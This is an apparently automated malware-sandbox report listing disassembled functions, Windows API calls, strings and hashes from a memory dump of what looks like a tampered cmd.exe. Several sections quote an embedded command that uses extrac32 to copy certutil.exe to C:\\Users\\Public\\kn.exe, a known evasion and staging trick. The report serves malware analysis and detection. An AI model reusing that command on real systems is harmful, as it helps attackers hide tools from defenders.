Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heapwcschr$AllocProcessmemset
String ID: -$:.\$=,;$=,;+/[] "
API String ID: 2872855111-969133440
Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
Instruction ID: 973aa397f690d5678325aab4eb33ddac06a36ebbd8bccdcfe62e715200c842c1
Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
Instruction Fuzzy Hash: 78B1C465A0C742A1EA60AB15D06827DE7A1FF48B82FE50579CE5E43BD4DFBCE845C320

Function 00007FF7823DFC30 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DFC38
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DFC52
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823E0181
memset.MSVCRT ref: 00007FF7823ED580
longjmp.MSVCRT ref: 00007FF7823ED59F
memmove.MSVCRT ref: 00007FF7823ED5C4
longjmp.MSVCRT ref: 00007FF7823ED5FC
longjmp.MSVCRT ref: 00007FF7823ED62B
longjmp.MSVCRT ref: 00007FF7823ED660

Strings

extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF7823DFD7F, 00007FF7823ED585, 00007FF7823ED5CB
0123456789, xrefs: 00007FF7823DFDEE

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
API String ID: 1606811317-2340392073
Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
Instruction ID: e00860efbd9c473a3ea2c4e64931b4596ab5695a75c1331ce6ad4181642798bb
Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
Instruction Fuzzy Hash: 8CD1D325E08B4281EA10AB15E8542B9B7A0FF45792FF4417ADE5D13BE8DFBCE845C720

Function 00007FF7824003AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF782400411
memset.MSVCRT ref: 00007FF782400436
memset.MSVCRT ref: 00007FF782400459

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF782400590
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7824005A0
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7824005BB
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7824006F3
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF782400712
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF782400731

Strings

~, xrefs: 00007FF78240046D
%04X-%04X, xrefs: 00007FF782400698

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$ErrorLast$InformationVolume
String ID: %04X-%04X$~
API String ID: 2748242238-2468825380
Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
Instruction ID: 6b1e7de7c1476dc56251e0df0b69927e56c78d98b626bb5d2138891ace3398d7
Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
Instruction Fuzzy Hash: 08A1D422708BC18AEB65DF21D8502E9B7A1FB85B86F908035DA4D0BB89DF7CD645C720

Function 00007FF7823E662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON

Download Yara Rule

APIs

wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF7823E6570,?,?,?,?,?,?,00000000,00007FF7823E6488), ref: 00007FF7823E6677
iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7823E6570,?,?,?,?,?,?,00000000,00007FF7823E6488), ref: 00007FF7823E668F
_errno.MSVCRT ref: 00007FF7823E66A3
wcstol.MSVCRT ref: 00007FF7823E66C4
iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7823E6570,?,?,?,?,?,?,00000000,00007FF7823E6488), ref: 00007FF7823E66E4
iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF7823E6570,?,?,?,?,?,?,00000000,00007FF7823E6488), ref: 00007FF7823E66FE

Strings

+-~!, xrefs: 00007FF7823E6670
APerformUnaryOperation: '%c', xrefs: 00007FF7823EF78E

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: iswdigit$_errnoiswalphawcschrwcstol
String ID: +-~!$APerformUnaryOperation: '%c'
API String ID: 2348642995-441775793
Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
Instruction ID: d34ee2cdc098a11bbbc706cc20f240ae443a7d5c78848314343d235add7fa717
Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
Instruction Fuzzy Hash: E471826AD08A4695E7606F11D421179F7A0FB45B86FA4C079DA4E02E94EFBCA588CB20

Function 00007FF7823D9400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D9462
memset.MSVCRT ref: 00007FF7823D9485
memset.MSVCRT ref: 00007FF7823D94AA

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823EB6A9

Part of subcall function 00007FF7823E5EE4: memset.MSVCRT ref: 00007FF7823E5F5D
Part of subcall function 00007FF7823E5EE4: towupper.MSVCRT ref: 00007FF7823E5FFE
Part of subcall function 00007FF7823E5EE4: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823E6029

GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D95D3
_wcsicmp.MSVCRT ref: 00007FF7823D9603
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D963D
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D965C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823EB67A

Strings

~, xrefs: 00007FF7823D94BE
FAT, xrefs: 00007FF7823D95F8

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
String ID: FAT$~
API String ID: 2238823677-1832570214
Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
Instruction ID: fc30206a72f3aeb723b97a568820c2fc98b46d0b2a1d774816f2cc26e7bdfb44
Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
Instruction Fuzzy Hash: 1671E272708BC19AEB61DF20D8542E9B7A0FB45786FA04078DA4D4BB58DF7CD649C710

Function 00007FF7823DD840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7823DFE2A), ref: 00007FF7823DD884
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7823DFE2A), ref: 00007FF7823DD89D
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7823DFE2A), ref: 00007FF7823DD94D
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7823DFE2A), ref: 00007FF7823DD964
_wcsnicmp.MSVCRT ref: 00007FF7823DDB89
wcstol.MSVCRT ref: 00007FF7823DDBDF
wcstol.MSVCRT ref: 00007FF7823DDC63
memmove.MSVCRT ref: 00007FF7823DDD33
memmove.MSVCRT ref: 00007FF7823DDE9A
longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7823DFE2A), ref: 00007FF7823DDF1F

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
String ID:
API String ID: 1051989028-0
Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
Instruction ID: c08579f29b1ec98021cca7196fcc318ea3dba72e64fa7971a2d768275d4e27e4
Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
Instruction Fuzzy Hash: 8A02B373A0874981EB20AF15E42827AF7A1FB85B95FA44179DA8D03F94DFBCE445C720

Function 00007FF7823D86B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823D8711
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823D8729
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823D8748
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823D875F
_wcsicmp.MSVCRT ref: 00007FF7823D8805
_wcsicmp.MSVCRT ref: 00007FF7823D881F
_wcsicmp.MSVCRT ref: 00007FF7823D8839

Strings

DISABLEDELAYEDEXPANSION, xrefs: 00007FF7823EB366
DISABLEEXTENSIONS, xrefs: 00007FF7823D8815
ENABLEDELAYEDEXPANSION, xrefs: 00007FF7823D882F
ENABLEEXTENSIONS, xrefs: 00007FF7823D87FB

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$_wcsicmp$AllocProcess
String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
API String ID: 3223794493-3086019870
Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
Instruction ID: c78c9aefe6a8292bff6f8e364cba6bbe09cbacdefcc750e6c63abc50257d2d8d
Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
Instruction Fuzzy Hash: B551C465A09B4296EB44BB15E414179BBA0FF49B52FB84178C91E077A0DFBCE845C730

Function 00007FF7823E2B94 Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LSS, xrefs: 00007FF7823E2C9C
EQU, xrefs: 00007FF7823E2C6B
LEQ, xrefs: 00007FF7823E2CB6
NEQ, xrefs: 00007FF7823E2C82
GTR, xrefs: 00007FF7823E2CD0
GEQ, xrefs: 00007FF7823E2D38

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID:
String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
API String ID: 0-3124875276
Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
Instruction ID: 8b178debcb7473ae01a460edb649f8a65f6e5f24254e22ac98c752dc488b6dd8
Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
Instruction Fuzzy Hash: 5051AE24A0864395FA507B21E4242B9BBA1BF44B47FE0407AC61E57EA5DFBCA849D730

Function 00007FF7823FBFEC Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 444COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7823FC6DB), ref: 00007FF7823E58EF

Part of subcall function 00007FF7823E081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E084E

towupper.MSVCRT ref: 00007FF7823FC1C9
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FC31C
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF7823FC5CB

Strings

\, xrefs: 00007FF7823FC30F
%s>, xrefs: 00007FF7823FC684
%s , xrefs: 00007FF7823FC3D6
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF7823FC003
Unknown, xrefs: 00007FF7823FC3AB
x, xrefs: 00007FF7823FC36B
PROMPT, xrefs: 00007FF7823FC079

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
API String ID: 2242554020-619615743
Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
Instruction ID: d36a381e16ac579321e2a686f4cf5f238d215a7b8ad130d07d3b50a602b96ca8
Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
Instruction Fuzzy Hash: D412A321A5864281EE64FB15A42017AE3A0FF44BA2FE44679DD5E03BE0DFBCE945D730

Function 00007FF7823E6FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823E7013

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823E7123

Part of subcall function 00007FF7823E1EA0: wcschr.MSVCRT(?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF782400D54), ref: 00007FF7823E1EB3

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E706E
wcsncmp.MSVCRT ref: 00007FF7823E70A5
wcsstr.MSVCRT ref: 00007FF7823EF9DB
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823EFA00
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823EFA5F

Part of subcall function 00007FF7823E823C: FindFirstFileExW.KERNELBASE ref: 00007FF7823E8280
Part of subcall function 00007FF7823E823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E829D

Part of subcall function 00007FF7823E3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7823FEAC5,?,?,?,00007FF7823FE925,?,?,?,?,00007FF7823DB9B1), ref: 00007FF7823E3A56

GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823EFA3D

Strings

\\.\, xrefs: 00007FF7823E7097

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
String ID: \\.\
API String ID: 799470305-2900601889
Opcode ID: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
Instruction ID: 271730f4e5713124116fa76b5f97b8c63fd2872904a0f578f10e2dba372c912e
Opcode Fuzzy Hash: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
Instruction Fuzzy Hash: 5251FC36A087C2A5EB60AF11E4102B9B7A0FB85B46FA54579D90D07F94DFBCD449C720

Function 00007FF7823D8B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON

Download Yara Rule

APIs

wcsrchr.MSVCRT ref: 00007FF7823D8BAB
_wcsicmp.MSVCRT ref: 00007FF7823D8BD4
_wcsicmp.MSVCRT ref: 00007FF7823D8BF2
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D8C16
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823D8C2F
wcschr.MSVCRT ref: 00007FF7823D8CB3
wcschr.MSVCRT ref: 00007FF7823D8CD7

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
String ID:
API String ID: 1944892715-0
Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
Instruction ID: 0890e85a024417700d4e41c860527261d59ea223de77a8e9f8574da65965236c
Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
Instruction Fuzzy Hash: 95B1DF61A09742D6EA60BF11E464179E6A1FF44B82FE48479CA4E07BD0DEBCF885C730

Function 00007FF7823D5458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E3578: _get_osfhandle.MSVCRT ref: 00007FF7823E3584
Part of subcall function 00007FF7823E3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E359C
Part of subcall function 00007FF7823E3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35C3
Part of subcall function 00007FF7823E3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35D9
Part of subcall function 00007FF7823E3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35ED
Part of subcall function 00007FF7823E3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E3602

_get_osfhandle.MSVCRT ref: 00007FF7823D54DE
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823D552B
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823D554F
_get_osfhandle.MSVCRT ref: 00007FF7823F345F
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823F347E
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823F34C3
_get_osfhandle.MSVCRT ref: 00007FF7823F34DB
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823F34FA

Part of subcall function 00007FF7823E36EC: _get_osfhandle.MSVCRT ref: 00007FF7823E3715
Part of subcall function 00007FF7823E36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823E3770
Part of subcall function 00007FF7823E36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E3791

Part of subcall function 00007FF7823D566C: wcschr.MSVCRT ref: 00007FF7823D5690

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
String ID:
API String ID: 1356649289-0
Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
Instruction ID: a902d927f4699f31ae794a6369806cf6ad297b353383e8622069905770ddfa83
Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
Instruction Fuzzy Hash: D991A532A0864297EB54AF11E414179FBE1FB88B82FA44179DA4E47B91DF7CE484CB20

Function 00007FF7823F86FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823F883F
GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF7823F897A
